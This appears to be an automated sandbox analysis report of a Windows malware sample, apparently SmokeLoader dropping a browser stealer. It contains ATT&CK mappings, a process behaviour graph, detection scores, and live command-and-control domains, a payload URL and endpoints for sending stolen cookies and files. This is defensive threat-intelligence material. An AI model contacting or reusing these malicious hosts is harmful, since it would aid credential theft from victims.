      Source: Yara matchFile source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts
      131
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Exploitation for Privilege Escalation
      1
      Disable or Modify Tools
      2
      OS Credential Dumping
      2
      System Time Discovery
      Remote Services1
      Archive Collected Data
      4
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      2
      Valid Accounts
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      21
      Input Capture
      1
      Account Discovery
      Remote Desktop Protocol1
      Data from Local System
      21
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution
      Logon Script (Windows)2
      Valid Accounts
      3
      Obfuscated Files or Information
      1
      Credentials In Files
      2
      File and Directory Discovery
      SMB/Windows Admin Shares21
      Input Capture
      4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
      Access Token Manipulation
      12
      Software Packing
      NTDS147
      System Information Discovery
      Distributed Component Object Model3
      Clipboard Data
      115
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script412
      Process Injection
      1
      DLL Side-Loading
      LSA Secrets681
      Security Software Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      File Deletion
      Cached Domain Credentials251
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
      Masquerading
      DCSync14
      Process Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
      Valid Accounts
      Proc Filesystem11
      Application Window Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
      Virtualization/Sandbox Evasion
      /etc/passwd and /etc/shadow1
      System Owner/User Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
      Access Token Manipulation
      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
      Process Injection
      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
      Hidden Files and Directories
      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1473147 Sample: file.exe Startdate: 15/07/2024 Architecture: WINDOWS Score: 100 50 mussangroup.com 2->50 52 gebeus.ru 2->52 54 2 other IPs or domains 2->54 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Antivirus detection for URL or domain 2->76 78 7 other signatures 2->78 10 file.exe 2->10         started        13 wjshsfa 2->13         started        signatures3 process4 signatures5 84 Detected unpacking (changes PE section rights) 10->84 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->86 88 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->88 96 3 other signatures 10->96 15 explorer.exe 98 5 10->15 injected 90 Multi AV Scanner detection for dropped file 13->90 92 Machine Learning detection for dropped file 13->92 94 Maps a DLL or memory area into another process 13->94 process6 dnsIp7 58 mussangroup.com 185.149.100.242, 443, 49727 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 15->58 60 186.101.193.110, 49735, 49737, 49742 TelconetSAEC Ecuador 15->60 62 3 other IPs or domains 15->62 40 C:\Users\user\AppData\Roaming\wjshsfa, PE32 15->40 dropped 42 C:\Users\user\AppData\Local\Temp\9CFE.exe, PE32 15->42 dropped 44 C:\Users\user\...\wjshsfa:Zone.Identifier, ASCII 15->44 dropped 64 System process connects to network (likely due to code injection or exploit) 15->64 66 Benign windows process drops PE files 15->66 68 Deletes itself after installation 15->68 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->70 20 9CFE.exe 93 15->20         started        24 Later.pif 40 12 15->24         started        file8 signatures9 process10 dnsIp11 46 C:\Users\user\AppData\Local\Temp\Armenia, DOS 20->46 dropped 80 Found stalling execution ending in API Sleep call 20->80 27 cmd.exe 3 20->27         started        56 46.246.96.149, 49736, 49738, 49739 PORTLANEwwwportlanecomSE Sweden 24->56 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 file12 signatures13 process14 file15 48 C:\Users\user\AppData\Local\...\Later.pif, PE32 27->48 dropped 98 Drops PE files with a suspicious file extension 27->98 31 Later.pif 27->31         started        34 cmd.exe 2 27->34         started        36 conhost.exe 27->36         started        38 7 other processes 27->38 signatures16 process17 signatures18 100 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->100 102 Contains functionality to steal Chrome passwords or cookies 31->102 104 Injects a PE file into a foreign processes 31->104 106 Queries Google from non browser process on port 80 31->106

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      file.exe34%ReversingLabs
      file.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\wjshsfa100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\78801\Later.pif0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\9CFE.exe11%ReversingLabs
      C:\Users\user\AppData\Roaming\wjshsfa34%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://www.ecosia.org/newtab/0%URL Reputationsafe
      https://outlook.com0%URL Reputationsafe
      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
      http://46.246.96.149/e_usertestGoogle0%Avira URL Cloudsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      http://gebeus.ru/tmp/index.php100%Avira URL Cloudmalware
      https://api.msn.com/0%URL Reputationsafe
      https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
      https://word.office.comon0%Avira URL Cloudsafe
      https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
      http://46.246.96.149/sendfiles0%Avira URL Cloudsafe
      http://46.246.96.149/getcommands0%Avira URL Cloudsafe
      http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
      http://46.246.96.149/getpu0%Avira URL Cloudsafe
      http://46.246.96.149/browsers0%Avira URL Cloudsafe
      http://46.246.96.149/defenders0%Avira URL Cloudsafe
      http://46.246.96.149/connect0%Avira URL Cloudsafe
      http://46.246.96.149/sendcookies0%Avira URL Cloudsafe
      https://mussangroup.com/wp-content/images/pic1.jpg100%Avira URL Cloudmalware
      http://www.autoitscript.com/autoit3/00%Avira URL Cloudsafe
      http://46.246.96.149/proccesses0%Avira URL Cloudsafe
      http://cx5519.com/tmp/index.php100%Avira URL Cloudmalware
      http://46.246.96.149/osinfo0%Avira URL Cloudsafe
      http://46.246.96.149/0%Avira URL Cloudsafe
      http://46.246.96.149/x0%Avira URL Cloudsafe
      http://office-techs.biz/tmp/index.php100%Avira URL Cloudmalware
      http://crl.v0%Avira URL Cloudsafe
      http://evilos.cc/tmp/index.php100%Avira URL Cloudmalware
      http://46.246.96.149/softwares0%Avira URL Cloudsafe
      https://wns.windows.com/)s0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      evilos.cc
      127.0.0.127
      truetrue
        unknown
        gebeus.ru
        58.151.148.90
        truetrue
          unknown
          mussangroup.com
          185.149.100.242
          truetrue
            unknown
            FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZ
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://46.246.96.149/sendfilestrue
              • Avira URL Cloud: safe
              unknown
              http://gebeus.ru/tmp/index.phptrue
              • Avira URL Cloud: malware
              unknown
              http://46.246.96.149/getcommandstrue
              • Avira URL Cloud: safe
              unknown
              http://46.246.96.149/getputrue
              • Avira URL Cloud: safe
              unknown
              http://46.246.96.149/browserstrue
              • Avira URL Cloud: safe
              unknown
              http://46.246.96.149/defenderstrue
              • Avira URL Cloud: safe
              unknown
              https://mussangroup.com/wp-content/images/pic1.jpgtrue
              • Avira URL Cloud: malware
              unknown
              http://46.246.96.149/connecttrue
              • Avira URL Cloud: safe
              unknown
              http://46.246.96.149/sendcookiestrue
              • Avira URL Cloud: safe
              unknown
              http://cx5519.com/tmp/index.phptrue
              • Avira URL Cloud: malware
              unknown
              http://46.246.96.149/osinfotrue
              • Avira URL Cloud: safe
              unknown
              http://46.246.96.149/proccessestrue
              • Avira URL Cloud: safe
              unknown
              http://office-techs.biz/tmp/index.phptrue
              • Avira URL Cloud: malware
              unknown
              http://46.246.96.149/softwarestrue
              • Avira URL Cloud: safe
              unknown
              http://evilos.cc/tmp/index.phptrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://word.office.comonexplorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2171644821.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2171644821.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, 9CFE.exe, 00000007.00000003.2819759144.0000000002843000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000011.00000000.2887878869.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif, 00000013.00000000.3863074525.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif.8.dr, Services.7.drfalse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/chrome_newtabLater.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/ac/?q=Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • Avira URL Cloud: safe
              unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.icoLater.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • Avira URL Cloud: safe
              unknown
              http://46.246.96.149/e_usertestGoogleLater.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2169172089.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • Avira URL Cloud: safe
              unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • URL Reputation: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorError9CFE.exe, 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe, 00000007.00000000.2816744193.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              https://excel.office.comexplorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.microexplorer.exe, 00000002.00000000.2165022415.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2165059057.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2164441432.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.ecosia.org/newtab/Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • URL Reputation: safe
              unknown
              https://outlook.comexplorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://ac.ecosia.org/autocomplete?q=Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • URL Reputation: safe
              unknown
              http://www.autoitscript.com/autoit3/09CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.drfalse
              • Avira URL Cloud: safe
              unknown
              https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLater.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • URL Reputation: safe
              unknown
              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2169172089.000000000C549000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com/explorer.exe, 00000002.00000000.2165593335.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://46.246.96.149/xLater.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://46.246.96.149/Later.pif, Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.vexplorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.drfalse
              • URL Reputation: safe
              unknown
              https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              77.221.157.163
              unknownRussian Federation
              30968INFOBOX-ASInfoboxruAutonomousSystemRUtrue
              186.101.193.110
              unknownEcuador
              27947TelconetSAECtrue
              58.151.148.90
              gebeus.ruKorea Republic of
              17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
              46.246.96.149
              unknownSweden
              42708PORTLANEwwwportlanecomSEtrue
              185.149.100.242
              mussangroup.comTurkey
              209853VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLitrue
              IP
              127.0.0.127
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1473147
              Start date and time:2024-07-15 06:09:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 59s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@27/58@10/6
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 93%
              • Number of executed functions: 89
              • Number of non-executed functions: 211
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: file.exe
              TimeTypeDescription
              00:10:23API Interceptor181660x Sleep call for process: explorer.exe modified
              00:11:19API Interceptor1x Sleep call for process: 9CFE.exe modified
              00:11:23API Interceptor1554x Sleep call for process: Later.pif modified
              06:10:28Task SchedulerRun new task: Firefox Default Browser Agent 79ECFB1D26DF0811 path: C:\Users\user\AppData\Roaming\wjshsfa
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              77.221.157.163file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              fvI01ZBE1b.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              f82a12fabe1bd6370497ec34c93c8d7045cf35ce4ad4e9586f1a532018b0e7fd_dump.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              QI7nhei84z.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163/systemd.exe
              186.101.193.110S5cXNeuCGu.exeGet hashmaliciousSmokeLoaderBrowse
              • gebeus.ru/tmp/index.php
              a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
              • bipto.org/tmp/index.php
              58.151.148.90file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
              • gebeus.ru/tmp/index.php
              2gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
              • dbfhns.in/tmp/index.php
              QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
              • dbfhns.in/tmp/index.php
              mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
              • cajgtus.com/files/1/build3.exe
              a6GOcbfMde.exeGet hashmaliciousSmokeLoaderBrowse
              • nidoe.org/tmp/index.php
              oowDCOLXv5.exeGet hashmaliciousLummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, VidarBrowse
              • brusuax.com/dl/build2.exe
              0ns5NDsgwK.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
              • sjyey.com/tmp/index.php
              apeoxsTscm.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
              • sjyey.com/tmp/index.php
              file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Stealc, Vidar, XmrigBrowse
              • brusuax.com/dl/build2.exe
              file.exeGet hashmaliciousGlupteba, SmokeLoader, Socks5Systemz, Stealc, VidarBrowse
              • trmpc.com/check/index.php
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              mussangroup.comfile.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              fvI01ZBE1b.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              hH5mo7aGIf.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
              • 185.149.100.242
              gebeus.rufile.exeGet hashmaliciousSmokeLoaderBrowse
              • 187.211.38.89
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 210.182.29.70
              Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
              • 92.36.226.66
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 190.156.239.49
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 189.171.116.36
              fvI01ZBE1b.exeGet hashmaliciousSmokeLoaderBrowse
              • 220.125.3.190
              II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
              • 148.230.249.9
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 187.170.159.176
              f82a12fabe1bd6370497ec34c93c8d7045cf35ce4ad4e9586f1a532018b0e7fd_dump.exeGet hashmaliciousSmokeLoaderBrowse
              • 152.231.127.132
              QI7nhei84z.exeGet hashmaliciousSmokeLoaderBrowse
              • 123.212.43.225
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              POWERVIS-AS-KRLGPOWERCOMMKRbotx.mips.elfGet hashmaliciousMiraiBrowse
              • 116.41.250.223
              jew.mips.elfGet hashmaliciousMiraiBrowse
              • 49.169.86.177
              jew.mpsl.elfGet hashmaliciousMiraiBrowse
              • 115.141.77.174
              jew.ppc.elfGet hashmaliciousMiraiBrowse
              • 180.227.173.237
              sora.arm7.elfGet hashmaliciousMiraiBrowse
              • 125.176.30.111
              vNUaW4UiYI.elfGet hashmaliciousMiraiBrowse
              • 182.230.7.110
              ahN4x3ahps.elfGet hashmaliciousMiraiBrowse
              • 14.4.158.198
              Jdxh215HCJ.elfGet hashmaliciousMirai, MoobotBrowse
              • 112.156.109.150
              O5XVFL6XD2.elfGet hashmaliciousMiraiBrowse
              • 180.224.40.45
              bolonetwork.x86.elfGet hashmaliciousMirai, OkiruBrowse
              • 182.219.54.80
              TelconetSAECS5cXNeuCGu.exeGet hashmaliciousSmokeLoaderBrowse
              • 186.101.193.110
              bolonetwork.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
              • 157.100.203.152
              arm7-20240709-0417.elfGet hashmaliciousMiraiBrowse
              • 181.39.203.228
              5GOuTtZoQn.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
              • 186.101.193.110
              EiPVv5yELP.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
              • 186.101.193.110
              Ul8gIL4P3u.elfGet hashmaliciousMirai, MoobotBrowse
              • 186.3.191.144
              MMNSxD2fJ3.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
              • 186.101.193.110
              QsyCac05Yl.elfGet hashmaliciousMirai, MoobotBrowse
              • 181.39.145.17
              file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
              • 186.4.194.68
              b59e52b83b0a0cde0085b3ba306316a86a845a974cbeaf45da905476b6db53bb_dump.exeGet hashmaliciousSmokeLoaderBrowse
              • 186.4.194.68
              PORTLANEwwwportlanecomSEfile.exeGet hashmaliciousSmokeLoaderBrowse
              • 46.246.96.149
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 46.246.96.149
              Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
              • 46.246.96.149
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 46.246.96.149
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 46.246.96.149
              2ta71O8iWY.elfGet hashmaliciousMiraiBrowse
              • 82.214.57.153
              FcMd5XxxZ0.elfGet hashmaliciousMiraiBrowse
              • 5.249.175.220
              fvI01ZBE1b.exeGet hashmaliciousSmokeLoaderBrowse
              • 46.246.96.149
              II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
              • 46.246.96.149
              yz6eX2aHlT.exeGet hashmaliciousXWormBrowse
              • 46.246.4.4
              INFOBOX-ASInfoboxruAutonomousSystemRUfile.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              27e2394f7b506257a8afa48049a8fe2fef59dc87957def06bd51d1d9dc191732_payload.exeGet hashmaliciousXenoRATBrowse
              • 77.221.152.198
              27e2394f7b506257a8afa48049a8fe2fef59dc87957def06bd51d1d9dc191732_payload.exeGet hashmaliciousXenoRATBrowse
              • 77.221.152.198
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              fvI01ZBE1b.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              II0MvEwlPf.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 77.221.157.163
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              a0e9f5d64349fb13191bc781f81f42e1winst.exeGet hashmaliciousUnknownBrowse
              • 185.149.100.242
              winst.exeGet hashmaliciousUnknownBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              Loader.exeGet hashmaliciousLummaC, XmrigBrowse
              • 185.149.100.242
              utb4rWi35E.exeGet hashmaliciousLummaCBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 185.149.100.242
              mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
              • 185.149.100.242
              https://mnconsulting.com.au/8537659878_pdf.htmlGet hashmaliciousCVE-2024-21412Browse
              • 185.149.100.242
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
